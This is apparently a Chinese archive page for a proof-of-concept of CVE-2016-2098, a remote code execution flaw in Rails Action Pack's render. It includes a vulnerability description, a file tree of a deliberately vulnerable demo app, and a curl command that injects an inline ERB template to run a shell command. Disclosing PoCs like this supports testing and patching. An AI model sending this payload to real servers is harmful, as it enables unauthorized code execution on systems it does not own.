关联漏洞
标题:
Ruby on Rails Action Pack 安全漏洞
(CVE-2016-2098)
描述:Ruby on Rails(Rails)是Rails核心团队开发维护的一套基于Ruby语言的开源Web应用框架,它是由大卫-海纳梅尔-韩森从美国37signals公司的项目管理工具Basecamp里分离出来的。Action Pack是其中的一个用于构建和测试MVC Web应用程序的组件。 Ruby on Rails的Action Pack中存在安全漏洞,该漏洞源于‘render’函数没有充分过滤用户提交的输入。远程攻击者可通过向应用程序发送特制的数据利用该漏洞执行任意Ruby代码。以下版本受到影响:Rub
描述
A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)
介绍
# A PoC of CVE-2016-2098
* rails 4.2.5.1
* view has a vulnerable code
app/views/poc/render1.html.erb
* following command will cause remote code execution
```$ curl '<your_host>:3000/poc/render1?template\[inline\]=<%25%3d`sleep+5`%25>'```
文件快照
[4.0K] /data/pocs/77ba3f71a665c6cc930b2fffef737dfcde8f878e
├── [4.0K] app
│ ├── [4.0K] assets
│ │ ├── [4.0K] images
│ │ ├── [4.0K] javascripts
│ │ │ ├── [ 661] application.js
│ │ │ └── [ 211] poc.coffee
│ │ └── [4.0K] stylesheets
│ │ ├── [ 686] application.css
│ │ └── [ 174] poc.scss
│ ├── [4.0K] controllers
│ │ ├── [ 204] application_controller.rb
│ │ ├── [4.0K] concerns
│ │ └── [ 68] poc_controller.rb
│ ├── [4.0K] helpers
│ │ ├── [ 29] application_helper.rb
│ │ └── [ 21] poc_helper.rb
│ ├── [4.0K] mailers
│ ├── [4.0K] models
│ │ └── [4.0K] concerns
│ └── [4.0K] views
│ ├── [4.0K] layouts
│ │ └── [ 311] application.html.erb
│ └── [4.0K] poc
│ ├── [ 51] render1.html.erb
│ └── [ 10] _template1.html.erb
├── [4.0K] bin
│ ├── [ 129] bundle
│ ├── [ 268] rails
│ ├── [ 213] rake
│ ├── [ 805] setup
│ └── [ 488] spring
├── [4.0K] config
│ ├── [1.4K] application.rb
│ ├── [ 132] boot.rb
│ ├── [ 552] database.yml
│ ├── [ 150] environment.rb
│ ├── [4.0K] environments
│ │ ├── [1.6K] development.rb
│ │ ├── [3.2K] production.rb
│ │ └── [1.7K] test.rb
│ ├── [4.0K] initializers
│ │ ├── [ 486] assets.rb
│ │ ├── [ 404] backtrace_silencers.rb
│ │ ├── [ 129] cookies_serializer.rb
│ │ ├── [ 194] filter_parameter_logging.rb
│ │ ├── [ 647] inflections.rb
│ │ ├── [ 156] mime_types.rb
│ │ ├── [ 157] session_store.rb
│ │ └── [ 517] wrap_parameters.rb
│ ├── [4.0K] locales
│ │ └── [ 634] en.yml
│ ├── [1.6K] routes.rb
│ └── [ 964] secrets.yml
├── [ 153] config.ru
├── [4.0K] db
│ └── [ 343] seeds.rb
├── [1.5K] Gemfile
├── [4.0K] Gemfile.lock
├── [4.0K] lib
│ ├── [4.0K] assets
│ └── [4.0K] tasks
├── [4.0K] log
├── [4.0K] public
│ ├── [1.5K] 404.html
│ ├── [1.5K] 422.html
│ ├── [1.4K] 500.html
│ ├── [ 0] favicon.ico
│ └── [ 202] robots.txt
├── [ 249] Rakefile
├── [ 250] README.md
└── [4.0K] vendor
└── [4.0K] assets
├── [4.0K] javascripts
└── [4.0K] stylesheets
29 directories, 45 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。